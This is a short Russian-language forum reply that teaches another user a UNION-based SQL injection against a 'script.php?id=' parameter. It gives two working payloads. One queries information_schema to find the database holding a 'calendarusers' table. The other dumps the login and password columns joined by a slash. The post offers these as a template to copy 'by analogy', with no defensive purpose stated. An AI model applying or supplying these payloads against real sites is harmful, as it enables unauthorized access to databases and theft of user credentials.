bobob, ты читал мануалы по инъекциям ? )) Перечитай )))

Допустим у тебя есть таблица calendarusers. Тебе нужно узнать в какой БД она находится. Для этого пишешь запрос

script.php?id=-1+union+select+1,2,table_schema,4+from+information _schema.tables+where+table_name='calendarusers'/*

Допустим в ответ вывело - firstbd. Тогда составляешь запрос

script.php?id=-1+union+select+1,2,concat_ws(0x2F,login,password), 4+from+firstbd.calendarusers/*

Теперь делай по аналогии